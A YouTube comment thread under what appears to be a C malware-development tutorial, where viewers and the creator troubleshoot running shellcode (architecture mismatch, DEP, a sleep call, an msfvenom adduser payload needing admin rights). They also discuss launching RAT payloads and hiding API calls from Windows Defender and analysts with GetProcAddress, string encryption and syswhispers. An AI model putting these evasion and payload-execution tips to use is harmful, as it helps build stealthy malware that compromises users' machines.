Thank you man. full support from my side. please make more videos like this (creating advance malwares using C). and please make the font size bigger bcz i use magnify to watch you video 😂😂
Please, Help me! How do we set up the enviroment to run the shellcode in windows 10. I make this malware. But it doesn't work. I also create it in Flare-VM. But it also doesn't work.
Thanks for another great tutorial. I have an issue: I compiled the source code successfully but if I start the executable, it didn't start notepad but I found in Event Viewer that the application has crashed. Do you have a recommendation, where to start to look for the beginning of this issue? (Env: Win 10 Enterprise, Visual Studio 2022)
Please check that if you are compiling code from a 64 bit compiler, you have to use a 64 bit shellcode, if you are compiling from a 32 bit compiler, use a 32 bit version of the shellcode
Okay, so I used VS2022 community edition to compile the source code (as you did: cl shellcode.c), notepad still not opening and the program dies (of course, it's enabled in Defender). Checking the Event Viewer messages, there is an error code 0x0000005 - access denied. The only thing that I could think about here is DEP - but I cannot add this program as an exception.
Finally: I used an adduser payload from msfvenom - it is platform independent on Windows - and successfully managed to get it running. NOTE for all readers: it works only if the shellcode is running as administrator (adding a user is an administrative task).
If we don't add a sleep function, the thread will not execute, try it on your own it won't work. It will execute but you won't see any results, the shellcode won't execute
Yes, there is a good course by Sektor7 team on malware development, Here is the link to it www.udemy.com/share/103xaK3@HTifBnsP4YhM8S4C_0Lyawbw4ux55qSfQIK0BnmMUcvm-X5ArRPOFchlVDYSbVdSJQ==/
You can also hide the API Calls by GetProcAddress and GetModuleHandle too. Just get a handle to the kernel32.dll and import the functions which you want, tho, the API Call name would get detected if the analyst runs strings on the binary, for that you could use some string encryption to hide the API Call string
Dayummm.. keep it on,
sir... big fan always....
Thank you man. full support from my side. please make more videos like this (creating advance malwares using C). and please make the font size bigger bcz i use magnify to watch you video 😂😂
Sorry about the font size issue, I did correct that mistake in the latest video 😁👍🏻
good stuff @ActiveXSploit !!! Keep it up. Also... Options > Theme > DarkMode ftw ;)
Haha 😂 thank you!
Thanks for the video... please keep making them, really useful content
What an awesome video! Thank you!
Amazing just what I was lookin 4!! Hope to learn more
any tips for heuristics ?
Please, Help me! How do we set up the enviroment to run the shellcode in windows 10. I make this malware. But it doesn't work. I also create it in Flare-VM. But it also doesn't work.
Thanks for another great tutorial.
I have an issue: I compiled the source code successfully but if I start the executable, it didn't start notepad but I found in Event Viewer that the application has crashed. Do you have a recommendation, where to start to look for the beginning of this issue? (Env: Win 10 Enterprise, Visual Studio 2022)
Please check that if you are compiling code from a 64 bit compiler, you have to use a 64 bit shellcode, if you are compiling from a 32 bit compiler, use a 32 bit version of the shellcode
@@ActiveXSploit Ah, let me check. I definitely used a 32 bit compiler on Kali but the shellcode is x64. I will keep you posted here.
Okay, so I used VS2022 community edition to compile the source code (as you did: cl shellcode.c), notepad still not opening and the program dies (of course, it's enabled in Defender). Checking the Event Viewer messages, there is an error code 0x0000005 - access denied. The only thing that I could think about here is DEP - but I cannot add this program as an exception.
Turned off DEP - the program still dies - possibly memory access violation.
Finally: I used an adduser payload from msfvenom - it is platform independent on Windows - and successfully managed to get it running. NOTE for all readers: it works only if the shellcode is running as administrator (adding a user is an administrative task).
Great stuff man
nice videos! also, you sound a lot like hackersploit, I almost thought you were the same person haha
hello, this might seem dumb to ask but does this work in c too (not just cpp)
Yes mate, it does
how can we run other payload exe like asyncrat etc using WinAPI?
You can use the ShellExecute Function call or the CreateProcess one
Yes, this i guess is the method for executing another PE inside your main PE program
need a spyware in c
jajajajajajajja
Good job, can you share your vm environment files, thks!!!
why we needed to sleep in the end ?
If we don't add a sleep function, the thread will not execute, try it on your own it won't work. It will execute but you won't see any results, the shellcode won't execute
I can sense you are an indian bro, isn't it? Make continuous video on the channel. Your content is underrated. It's totally fabulous.
Yes 😁, Thank you!
i sense a new mic ? 👀
👀👀
roadmap for mal Dev????
I will be uploading a video on that soon, Stay tuned for further updates!
@@ActiveXSploit looking forward!
great content man, thx for that. Just zoom in a little on edit my eyes are weak hahahah peace
Really sorry about the small size of the screen, i just forget it everytime but it won't happen the next time ;)
is this HackerSploit ?
Nah mate 😂
thanks
Great
Plz dont stop making vids
any malware course?
I'm sorry for not uploading videos, my final year exams are about to start, i have to focus on them.
Yes, there is a good course by Sektor7 team on malware development, Here is the link to it
www.udemy.com/share/103xaK3@HTifBnsP4YhM8S4C_0Lyawbw4ux55qSfQIK0BnmMUcvm-X5ArRPOFchlVDYSbVdSJQ==/
@@ActiveXSploit Thanks! I will take the course, if you know some more advance course let me know please! :)
Sektor7 has an advanced course, lookup for it on their site, you'll find it
You are sound like Hackersploit, but with a lil bit indian accent
danke
I need microscope to see that tiny font
I apologize for that mate, I've fixed the font size issue in the videos uploaded after this one
Thnx,I will subscribe for appritiation@@ActiveXSploit
have used syswhispers it"s a really cool way to hide api calls
You can also hide the API Calls by GetProcAddress and GetModuleHandle too. Just get a handle to the kernel32.dll and import the functions which you want, tho, the API Call name would get detected if the analyst runs strings on the binary, for that you could use some string encryption to hide the API Call string
@@ActiveXSploit cool, i"ve never thought of this. but does it evade windows defender?
I believe it will, it should pass the static analysis phase, tho the malware should get detected in the behavioural analysis phase
@@ActiveXSploit I though so, since you need a way to remove or evade the defnder API hooking.
I didn’t knew of that but yeah I try it in my way mentioned above and it does work